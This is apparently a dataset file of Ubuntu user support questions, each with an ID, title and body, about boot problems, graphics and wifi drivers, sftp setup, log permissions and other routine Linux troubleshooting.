402238	how to write log before instalation	my computer crashes while trying to load kernel from livecd with message `` unable to handle kernel paging request '' . i 'd like to reproduce error output somewhere on forum to get some ideas on where to dig , but i ca n't figure out how to save that trace except by using photocamera . is there some option to save output on hard drive , or at least allow scrolling to beginning of error . i have currently installed windows and ubuntu 9.10 , trying to install ubuntu 12.04 . same error happens with other linux distributives . thank you !
402242	blank screen/command prompt on ubuntu/window 8.1 daul boot toshiba laptop	for the last few days i have been trying to configure a laptop to dual boot . the laptop works works very well booting into both ubuntu 12.04 lts and widows 81. without any issue until i install item 1 ( i need these updates for android development work ) . the same issue can be duplicated by installing item 2 . the blank screen / command line appears after the grub menu . sudo apt-get install git-core gnupg flex bison gperf build-essential zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 libgl1-mesa-dev g++-multilib mingw32 openjdk-6-jdk tofrodos python-markdown libxml2-utils xsltproc zlib1g-dev : i386 minicom tftpd uboot-mkimage expect libgl1-mesa-dri sudo ln -s /usr/lib/i386-linux-gnu/mesa/libgl.so.1 /usr/lib/i386-linux-gnu/libgl.so sudo apt-get install xserver-xorg-video-intel per the follwing post `` how do i install intel graphic drivers '' it is my understanding that the intel graphic drivers are part of the xserver-xorg-video-intel driver package . note : i have reviewed other posts but does n't seem to find a solution . thus this post . main hardware toshiba satellite c55-a5310 intel i3-3120m processor intel速 hd graphics 4000 ( ivy bridge gpu ) software window 8.1 ubuntu 12.04.3 lts ( uname -r > 3.8.0-35-generic ) summary of what i have tried so far : change quiet splash to nomodeset . sudo apt-get install mesa-utils edit grub - > grub_cmdline_linux_default= '' quiet splash nomodeset '' , grub_gfxmode=1366x768 , update-grub - > stuck at ubuntu splash , ( starting cups printing spooler/server ok ) references dual-boot windows 8 and ubuntu 12.10 in uefi mode installing ubuntu along side windows 8
402247	ubuntu 13.10 & hp envy m6-1310sa , bad wifi connection	i installed kubuntu 13.10 , with the 3.11.0-14 kernel , to a hp envy m6-1310sa laptop . my wireless connection was unreliable ; it frequently disconnected and could reconnect only after reloading its driver in the kernel : modprobe -r rt2800pci modprobe rt2800pci the wireless hardware was a ralink rt3290 : lspci -nn | grep 0280 03:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] updating my kernel to 3.12 , a known fix for this wireless card , introduced a different problem ; the display driver failed . i saw a command line at boot . xwindow resulted in a `` no monitor '' error .
402251	can not execute binary file	i installed ubuntu 12.04 in laptop . in this laptop two windows win7 and win 8 are already installed . i installed the 3rd os i.e ubuntu . installed from usb flash drive . installation wise no problem . however when i run simple c program ( which is hello world program ) , the compilation part no problem . however can not execute the binary file . giving error message as `` cant execute binary file '' followed the stepds from below links but in vain . http : //ubuntuforums.org/showthread.php ? t=1919786 http : //ubuntuforums.org/showthread.php ? t=1994513 tried installing both 32-bit and 64-bit i am new and stuck here . appreciate if someone helps me thanks reddy
402253	format problem docx file in libre writer ?	i 've asked this thread before : problem with libre office in ubuntu 13.04 ? now the problem is just the reverse . openning a docx file in libre office writer shows a kind of format problem like font , size of font increases , images overlapping eachother . any way to solve it.please help !
402256	boot with ubuntu livecd gives an error message before proceeding to a grub style menu , is it safe to proceed with installation ?	error message is could not open `` \efi\boot\fallback.efi '' : 14 i then get to a grub menu with four options : try ubuntu without installing , install ubuntu , oem install , check disc for defects . i have done the try ubuntu method , and the livecd ubuntu seems to work as normal . i am just worried about whether or not this would have implications for an efi ( uefi ) install , as the ubuntu uefi guide seems to suggest that i would need to install in efi mode , as my windows 8 is installed as efi ( and i will be dual booting ) .
402259	recovering an isofs partition	i recently created a riplinux startup disk on a 16gb thumb drive . i wanted to use this drive for other purporses but everytime i try and format the drive it gives me an error saying the disk is busy . i also read somewhere that this is a riplinux creates an isofs partition . how do i recover this drive to its full capacity . i created the disk on ubuntu 12.04 lts but it does not get formatted on either ubuntu or linux . ,
402262	how can i see the memory occupied by a file and folder and also entire directory from terminal ?	i 'm having some files and folders in the `` my documents '' directory . what are the commands to see the size of a file and directory in a terminal ?
402266	why does it take over a minute for the desktop to load after logging in ?	after entering the login-password , it takes more than a minute before the desktop is shown . the output of dmesg : [ 2030.004228 ] audit_printk_skb : 156 callbacks suppressed [ 2030.004231 ] type=1400 audit ( 1389169706.701:71 ) : apparmor= '' status '' operation= '' profile_replace '' parent=3598 profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=3602 comm= '' apparmor_parser '' [ 2030.004240 ] type=1400 audit ( 1389169706.701:72 ) : apparmor= '' status '' operation= '' profile_replace '' parent=3598 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=3602 comm= '' apparmor_parser '' [ 2030.004904 ] type=1400 audit ( 1389169706.701:73 ) : apparmor= '' status '' operation= '' profile_replace '' parent=3598 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=3602 comm= '' apparmor_parser '' [ 3090.435641 ] perf samples too long ( 2510 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 11285.003065 ] perf samples too long ( 5009 > 5000 ) , lowering kernel.perf_event_max_sample_rate to 25000 and the output of uname -a : linux bedc-linux-thinkpad-r500 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:16:27 utc 2013 i686 i686 i686 gnu/linux what is going on here ?
402268	shift + alt consumes triple-key combinations	i 've got shift + alt for keyboard layout change . but it forbids me to use combination like shift + alt + r ( very often used in eclipse/java ) . when i press these 3 keys the language is changed and eclipse can not intercept the key press . that happened after the upgrade to 13.10 . is there some fix for this ?
402271	empty additional drivers tab after installing nvidia-319 and problem with nvidia-settings	i have just installed ubuntu 13.10 x64 . after installing nvidia-319-updates and nvidia-settings-319-updates i do n't have anything in additional drivers tab of software and updates . additionally when i run nvidia-settings i get this : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . i do n't have nvidia-xconfig /var/log âť sudo nvidia-xconfig sudo : nvidia-xconfig : command not found /var/log âť dpkg -l |grep nouveau ; dpkg -l |grep nvidia d21d3q @ zkomp ii libdrm-nouveau2 : amd64 2.4.46-1ubuntu1 amd64 userspace interface to nouveau-specific kernel drm services -- runtime ii xserver-xorg-video-nouveau 1:1.0.9-2ubuntu1 amd64 x.org x server -- nouveau display driver ii bumblebee-nvidia 3.2.1-3 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-319-updates 319.60-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-common 1:0.2.83 amd64 transitional package for ubuntu-drivers-common ii nvidia-cuda-dev 5.0.35-7ubuntu1 amd64 nvidia cuda development files ii nvidia-cuda-doc 5.0.35-7ubuntu1 all nvidia cuda and opencl documentation ii nvidia-cuda-gdb 5.0.35-7ubuntu1 amd64 nvidia cuda gdb ii nvidia-cuda-toolkit 5.0.35-7ubuntu1 amd64 nvidia cuda toolkit ii nvidia-opencl-dev : amd64 5.0.35-7ubuntu1 amd64 nvidia opencl development files ii nvidia-profiler 5.0.35-7ubuntu1 amd64 nvidia profiler for cuda and opencl ii nvidia-settings-319-updates 319.60-0ubuntu1 amd64 tool for configuring the nvidia graphics driver ii nvidia-visual-profiler 5.0.35-7ubuntu1 amd64 nvidia visual profiler edit $ sudo apt-get install nvidia-current reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-current : depends : xorg-video-abi-11 but it is not installable or xorg-video-abi-12 but it is not installable or xorg-video-abi-13 but it is not installable recommends : nvidia-settings-current but it is not installable e : unable to correct problems , you have held broken packages . edit after making some more mess with drivers i reinstalled system ( i found this option faster than playing with drivers ) , but still additional drivers tab is empty . installing 'nvidia-319-updates ' causes black screen after log in ( with removed xorg.conf , with not removed i have extremely low resolution and also black screen ) edit black screen was caused bu this bug this bug . now it works , but 'nvidia-settings ' are empty ( but there is no information that i am not using nvidia drivers so i guess that they are ok ) also additional drivers tab is still empty :
402274	ubuntu start up problem	i have a relatively fresh install of saucy salamander , however i 'm experiencing quite some difficulty when starting up my computer . my computer seems to crash / freeze more often than not between the grub `` choose your os '' and logging in to ubuntu . most of the time i see a purple or black screen after pressing enter and it never progresses from there . sometimes it freezes at the log in screen after the ubuntu drum sound . least often , it freezes just a few seconds after logging in . if i get to the point of having logged in , and it has not frozen after a minute , the system seems to be stable , and i have n't experienced any problems in the normal usage . so whatever the issue is , it seems to occur after grub loader and before log in . my system specs : amd fx 8120 , 8 core 3.1ghz 8 gb ram ocz 60 gb ssd ( < - problematic ubuntu ) seagate barracuda 500 gb ( < - win7 , no problems booting ) asrock 990fx extreme 3 mobo radeon hd 6970 video card ( ubuntu uses the proprietary driver ) in short : i must restart my computer 5 to 10 times before i can log into ubuntu properly . i have no problem loading windows on my other hd . i see no freezing / crash if i do manage to log in successfully . what can cause this ? how to fix ?
402275	automatically switch equalizer preset based on audio output ( internal speaker or external )	the facts below come from experience with ubuntu 13.10 on a 64-bit laptop . context/problem : bad speakers as many people know , laptop speakers have `` highly unequal frequency response '' as audio professional would say . normal people say : `` they sound very bad '' . first-step solution : equalization equalizing provides a valuable workaround , dramatically improving sound quality with a one-time effort . for example , i installed pulseaudio equalizer from web upd8 . for good results , equalization values should be chosen based on measurements , but that 's another story ( i could do it with ubuntu alone though it 's tricky , ask me for details ) . remaining problem : equalization curve is output-dependent equalization values are attached to the whole chain , though generally only the speakers are a major source of unequal response . this means i have two equalization profiles : one for laptop speakers ( with wildly varying equalization curve ) another ( much flatter curve , so disabling equalization is often acceptable ) when an external stereo is plugged to e.g . a 3.5mm jack . current situation in practice : auto un/mute , good but insufficient when plugging the 3.5mm jack to the external stereo , internal speakers are automatically muted and volume adjusted by the ubuntu stack . this is good but insufficient . when unplugging , internal speakers are automatically activated again . this is good but insufficient . improvement : not only auto-mute but auto-select eq curve it would be much better to have the correct equalizer preset applied when un/plugging the 3.5mm jack . plug the external stereo , the flat curve is selected . unplug the stereo , internal speaker get their correction curve . questions how to make a quick-and-dirty hack ? how to detect jack plug from a script ? regarding detecting the plugging event . i could not find documentation on the web , plus the keyword `` jack '' returns results regarding the jack software suite , irrelevant here . meager starting points : sound - how to automatically change volume level when un-/plugging headphones ? - ask ubuntu jack detection for audio : blueprints : ubuntu regarding changing the equalizer curve i could not find any documentation about pulseaudio-equalizer-gtk . a proof-of-concept script fiddling with files then calling pulseaudio-equalizer interface.applysettings could change the settings , but the gui would n't be aware . how to make a clean setup : assign the equalization curve to internal speaker , not just plug event . for example , say i plug a usb audio device and play audio through it . the quick-and-dirty hack would change eq curve whenever the 3.5mm jack is un/plugged , though the audio actually continued to go to the usb audio device not the internal speaker , making eq curve change irrelevant . in a `` clean '' setup , an equalization profile would be cleanly assigned to the internal speaker , making the thing more robust . whatever the situation , it would be always ( and only ) applied when needed . is anyone working on it ? any hint ? thank you for your attention .
402276	installation ( windows installer - ubuntu 12.04 lts )	installation ( windows installer - ubuntu 12.04 lts ) i downloaded the ( ubuntu 12.04 lts ) iso file then the ( install ubuntu with the windows installer ) it fully installed and restarted . then i chose the ubuntu os and black screen ... so i esc and started in safe mode and got `` _ '' symbol flashing ( to type something in ) but turns off few seconds and black screen ... have to force shutdown . please help thanks . michael
402280	tried to install and now i ca n't get into the web	i downloaded ubuntu for desktop 12.4 32 bit . at the end , it asked me to insert a disk and rejected the disk for not having enough space . i just clicked out of everything , restarted the computer and can no longer get onto the web . i am really a technophobe so i will need explicit instructions without any jargon in order to undo this . thanks all .
402283	burning ubuntu download onto dvd for installation purposes	i downloaded ubuntu 13.10 into my download files . the download consisted of 3 iso files . i attempted to burn those three files onto one dvd in order to install ubuntu onto my computer . after the first file was burned onto the dvd it was automatically finalized and ejected from the burner . i had to burn each of the three iso files onto separate dvds . i am unable to find a way to burn all three files onto one dvd . the dvd is of 4.7 gb size and should have enough space for all three files . i suspect that ubuntu installation wants all three files on one disk . any help would be appreciated .
402284	ubuntu with postfix and virtual users	i have ubuntu server with postfix , dovecot and virtual users . now i am tring to filter mails with procmail , but the rules on procmailrc are not working . anybody have some steps to do work the mail filters on the server ? thanks !
402288	rerun missing command with apt-get	when i run a command on a new machine ( or install that i 'm testing ) i often find that the package needs to be installed first . this leads , for example , to the following sequence : > colordiff the program 'colordiff ' is currently not installed . you can install it by typing : sudo apt-get install colordiff argggh . > apt-get install colordiff is there a way , when given the prompt that says the command you can install it by typing : sudo apt-get install xxxx to run sudo apt-get install xxxx without typing the entire line out ? the best i can do is : > apt-get install ! ! but since some command ( the shell ? ) is telling me what i should run , it would be nice if i could get that same program to run it for me .
402290	what this command do ? ls /usr/bin | grep ”man” | sed ”s/man/ # # # /” ?	i have a question i want to know what this command do ls /usr/bin | grep ”man” | sed ”s/man/ # # # /” i have use this command and show me everything with # # # , but i dont know whats mean . i hope someone can explain it .
402292	file readeable on computer , but not on usb	i just have a really big problem . i 've made a pdf file , and on my pc is readeable , and on others pc ( i 've send link to download to others ) but , when i put it on my usb flashdrive it 's not readeable anymore . please , what`s the matter ... ? thank you !
402293	pxe install of 13.10 server	i googled and successfully applied information how to pxe install the desktop from the live cd , and i can do pxe installs of the netboot images . but i did n't find anything how to install from the original server images . any help ?
402294	freeze on bios screen after boot-repair puts a certain file as efi	i am trying to create a dual boot of windows 8 and ubuntu on an acer travelmate p253-m . i successfully install ubuntu on the hard disk but it does n't boot . i tried several times with boot-repair , choosing different options but never succeeded . eventually , i could n't boot to either windows or ubuntu , only through livecd . so i went through boot-repair once more which said that i should put a certain file as efi . i did that , restarted and only acer logo appeared with nothing else . f2 does n't work , i ca n't get in to bios any way . what i have tried : re-seat the ram trying to boot with other hard drives trying to boot from flash drive trying to boot from cd ( and all possible combinations with these three ) downloaded bios update from the acer website , but it only has a version to flash from within windows ( .exe file , but i ca n't boot to windows or anything else at all ) shorted jcmos1 jumper for 20 seconds after which the acer logo disapeared and instead : after i press the power key , a completely black screen appears for about 5 seconds . after that the backlight on the monitor turns on and the message press to enter setup . appears on the very bottom . pressing f2 does nothing . if i hold fn+esc and then power up , system info appears : insyde h2o efi 3.7 , copyright ... system bios version : v2.13 , processor type etcetera on top and the press f2 to enter setup . on the bottom . pressing f2 removes the bottom message and scrolls one line up but nothing else . pressing alt+f10 removes the bottom message , scrolls about 4 lines but nothing else . i opened the laptop completely , removed the cmos battery for about an hour , shorted the jcmos1 pin once again , put it back - nothing . i found a way to flash the bios ( press fn+esc , plug power , press power button ) if i have the image on a flash drive . however i ca n't find an image as well .
402296	second display very buggy ( delayed response )	i have a dell xps15 laptop with an i7 , 8gb ram , intel hd3000 graphics and nvidia gt525m card . when i connect the external dell monitor , ubuntu still works fine on the laptop monitor , but the external one is very buggy - cursor , windows ... everything leaves traces that dissapear after 5-10s .
402300	wpa2 wi-fi connecting but not working on macbook pro 4.1	i have a macbook pro 4.1 with ubuntu 13.10 installed , as well as the broadcom drivers installed ( in software & updates/additional drivers ) connecting to an unsecured network or wep seems to work , but there is one that is wpa2 that i can connect to but once i am connected i am not able to ping anything including local machines or go out to the internet . os x machines and android devices have been able to successfully connect to this network . output of lspci -nn | grep 0280 : 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 05 ) nm-tool : http : //pastebin.com/mq6b3xjz note that work guest is the one i have succesfully connected to . work suppport is the one i am having issues with
402302	how can i allow access to both ssh and sftp ?	i started from the following article to set up sftp on ubuntu server : http : //blog.srmklive.com/2013/04/24/how-to-setup-sftp-server-ftp-over-ssh-in-ubuntu/ . if i follow these instructions , i can connect with sftp , but i am no longer able to connect to ssh from a terminal : this service allows sftp connections only . connection to 10.0.0.130 closed . here are the changes i made to sshd_config : subsystem sftp internal-sftp -f auth -1 verbose allowgroups sftpusers sftp sshusers match group sftpusers chrootdirectory % h allowtcpforwarding yes forcecommand internal-sftp x11forwarding no the user in question , jcoulson , is in both sftpusers and sshusers groups . any hints ? any further info you need ? thanks !
402304	can i safely change group ownership of /var/log/auth.log ?	i am the splunk administrator working with an ubuntu 12.04 lts system and i want to collect events from /var/log/auth.log . -rw-r -- -- - 1 root adm 16534643 jan 8 09:49 /var/log/auth.log splunk runs as a normal user , splunk . $ id splunk uid=1984 ( splunk ) gid=1984 ( splunk ) groups=1984 ( splunk ) normally , i 'd use this command so make the file group readable by the splunk group . $ chgrp splunk /var/log/auth.log -rw-r -- -- - 1 root splunk 16534643 jan 8 09:49 /var/log/auth.log this works fine on other linux distros and i assume this is okay with ubuntu as well . but i do want to ask , will bumping out the adm cause me ( actually , the other group that owns the box ) headaches in the future ? i am not a privileged user on the system , so i can not check things like /var/log/cron/adm or mail for the adm account . i 'm also assuming that logrotate will honor my new group owner for new files . ( before you ask , access to the splunk index for auth.log is restricted to a limited number of people . )
402308	how can i automatically execute a script after automatic boot ?	i 've recently opened a vps running ubuntu server 13.10 x86 ( with no graphical desktop ) in order to run a game server . since it 's a vps there 's a risk that the node may crash when i 'm not watching . this means i may want to have the server execute this script automatically when the server boots . how can i do that ? another problem is that it seems to require a username and password after boot .
402311	starting maas region controller service and api	after a power outage our openstack installation went down . first step is trying to get maas back up and running , but i 'm having trouble doing just that . the rc and the cc are running and can communcation ( have network ) . in my understanding the maas region controller api runs as a django application via wsgi on apache . apache runs , but fails on loading the maas wsgi script ( /usr/share/maas/wsgi.py ) . hence the service and the api is never started . rabbitmq and other services seem to be running on the rc . i have also tried to do : dpkg-reconfigure maas-region-controller without any success . the log below can be found in /var/log/apache/error.log . any ideas what i can try ? [ wed jan 08 11:01:06.312804 2014 ] [ mpm_event : notice ] [ pid 5725 : tid 139810242742144 ] ah00491 : caught sigterm , shutting down [ wed jan 08 11:01:06.326364 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] mod_wsgi ( pid=5728 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ wed jan 08 11:01:06.326607 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] mod_wsgi ( pid=5728 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ wed jan 08 11:01:06.326846 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] traceback ( most recent call last ) : [ wed jan 08 11:01:06.327054 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/share/maas/wsgi.py '' , line 32 , in < module > [ wed jan 08 11:01:06.327424 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] start_up ( ) [ wed jan 08 11:01:06.327611 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 70 , in start_up [ wed jan 08 11:01:06.327934 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] post_start_up ( ) [ wed jan 08 11:01:06.328109 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 110 , in post_start_up [ wed jan 08 11:01:06.328320 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] nodegroup.objects.refresh_workers ( ) [ wed jan 08 11:01:06.328491 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/models/nodegroup.py '' , line 116 , in refresh_workers [ wed jan 08 11:01:06.328908 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] refresh_worker ( nodegroup ) [ wed jan 08 11:01:06.329456 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] mod_wsgi ( pid=5727 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ wed jan 08 11:01:06.329662 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] mod_wsgi ( pid=5727 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ wed jan 08 11:01:06.329879 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] traceback ( most recent call last ) : [ wed jan 08 11:01:06.330074 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/share/maas/wsgi.py '' , line 32 , in < module > [ wed jan 08 11:01:06.330389 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] start_up ( ) [ wed jan 08 11:01:06.330567 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 70 , in start_up [ wed jan 08 11:01:06.330879 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] post_start_up ( ) [ wed jan 08 11:01:06.331050 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 110 , in post_start_up [ wed jan 08 11:01:06.331260 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] nodegroup.objects.refresh_workers ( ) [ wed jan 08 11:01:06.331426 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/models/nodegroup.py '' , line 116 , in refresh_workers [ wed jan 08 11:01:06.331831 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] refresh_worker ( nodegroup ) [ wed jan 08 11:01:06.332021 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/refresh_worker.py '' , line 41 , in refresh_worker [ wed jan 08 11:01:06.332207 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/maasserver/refresh_worker.py '' , line 41 , in refresh_worker [ wed jan 08 11:01:06.332485 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] refresh_secrets.apply_async ( queue=nodegroup.work_queue , kwargs=items ) [ wed jan 08 11:01:06.332758 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] refresh_secrets.apply_async ( queue=nodegroup.work_queue , kwargs=items ) [ wed jan 08 11:01:06.332938 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/task/__init__.py '' , line 459 , in apply_async [ wed jan 08 11:01:06.333143 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/task/__init__.py '' , line 459 , in apply_async [ wed jan 08 11:01:06.333856 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] **options ) [ wed jan 08 11:01:06.334453 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] **options ) [ wed jan 08 11:01:06.334627 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/amqp.py '' , line 196 , in delay_task [ wed jan 08 11:01:06.334805 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/amqp.py '' , line 196 , in delay_task [ wed jan 08 11:01:06.335226 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] entity = self._declare_queue ( queue , retry , _retry_policy ) [ wed jan 08 11:01:06.335642 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] entity = self._declare_queue ( queue , retry , _retry_policy ) [ wed jan 08 11:01:06.335823 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/amqp.py '' , line 172 , in _declare_queue [ wed jan 08 11:01:06.336002 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/celery/app/amqp.py '' , line 172 , in _declare_queue [ wed jan 08 11:01:06.336208 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] queue.declare ( ) [ wed jan 08 11:01:06.336396 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] queue.declare ( ) [ wed jan 08 11:01:06.336560 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/kombu/entity.py '' , line 492 , in declare [ wed jan 08 11:01:06.336733 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/kombu/entity.py '' , line 492 , in declare [ wed jan 08 11:01:06.337737 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] self.exchange.declare ( nowait ) [ wed jan 08 11:01:06.337941 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] self.exchange.declare ( nowait ) [ wed jan 08 11:01:06.338112 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/kombu/entity.py '' , line 162 , in declare [ wed jan 08 11:01:06.338318 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] nowait=nowait , passive=passive , [ wed jan 08 11:01:06.338492 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/kombu/entity.py '' , line 162 , in declare [ wed jan 08 11:01:06.338690 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/channel.py '' , line 603 , in exchange_declare [ wed jan 08 11:01:06.338897 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] nowait=nowait , passive=passive , [ wed jan 08 11:01:06.340001 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] ( 40 , 11 ) , # channel.exchange_declare_ok [ wed jan 08 11:01:06.340193 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/channel.py '' , line 603 , in exchange_declare [ wed jan 08 11:01:06.341389 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/abstract_channel.py '' , line 69 , in wait [ wed jan 08 11:01:06.341656 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] ( 40 , 11 ) , # channel.exchange_declare_ok [ wed jan 08 11:01:06.341972 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] self.channel_id , allowed_methods ) [ wed jan 08 11:01:06.342292 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/abstract_channel.py '' , line 69 , in wait [ wed jan 08 11:01:06.342618 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] self.channel_id , allowed_methods ) [ wed jan 08 11:01:06.342805 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/connection.py '' , line 204 , in _wait_method [ wed jan 08 11:01:06.343462 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] self.method_reader.read_method ( ) [ wed jan 08 11:01:06.343659 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/connection.py '' , line 204 , in _wait_method [ wed jan 08 11:01:06.344309 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] self.method_reader.read_method ( ) [ wed jan 08 11:01:06.344499 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/method_framing.py '' , line 187 , in read_method [ wed jan 08 11:01:06.344883 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] raise m [ wed jan 08 11:01:06.345057 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] file `` /usr/lib/python2.7/dist-packages/amqp/method_framing.py '' , line 187 , in read_method [ wed jan 08 11:01:06.345561 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] raise m [ wed jan 08 11:01:06.345765 2014 ] [ : error ] [ pid 5727 : tid 139810242742144 ] error : [ errno 4 ] interrupted system call [ wed jan 08 11:01:06.349404 2014 ] [ : error ] [ pid 5728 : tid 139810242742144 ] error : [ errno 4 ] interrupted system call [ wed jan 08 11:01:07.375856 2014 ] [ mpm_event : notice ] [ pid 7064 : tid 140623783114624 ] ah00489 : apache/2.4.6 ( ubuntu ) mod_wsgi/3.4 python/2.7.5+ configured -- resuming normal operations [ wed jan 08 11:01:07.389375 2014 ] [ core : notice ] [ pid 7064 : tid 140623783114624 ] ah00094 : command line : '/usr/sbin/apache2'
402312	ubuntu does not turn ( purple screen )	changed `` secure boot '' and installed ubuntu at startup , a purple screen , changing `` secure boot '' and the system is switched '' nomodeset '' does not eliminate the purple screen install the drivers for the video card : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current ... changing `` secure boot '' and i see on a black screen cursor to a crosshair if not change `` secure boot '' will be purple screen
402315	how to add a keyboard modifier state applet to unity panel ?	i am a kde user thinking about moving to unity . due to manual disability , i use sticky keys and in kde i have an applet in the system panel which shows which modifier keys are active . i remember that gnome had this feature as well , so do windows and os x . how does one ad the keyboard modifier state applet to the panel in unity ? clarification : i have already enabled sticky keys . i am asking how to add an applet which indicates the state of the modifier keys . this indicator would show when the shift key is depressed , when the alt key is depressed , when the tux key is depressed , and when the ctrl key is depressed . this applet exists in all major desktop environments ( kde , windows , mac osx , and gnome ) . it is necessary for accessibility of the desktop . here is an image of the keyboard modifier state applet , next to the keyboard layout indicator applet . the modifiers represented are , from left to right , shift , ctrl , alt , i-dont-know-this-one , tux/win , numlock , and capslock . it can be seen that the numlock key is active .
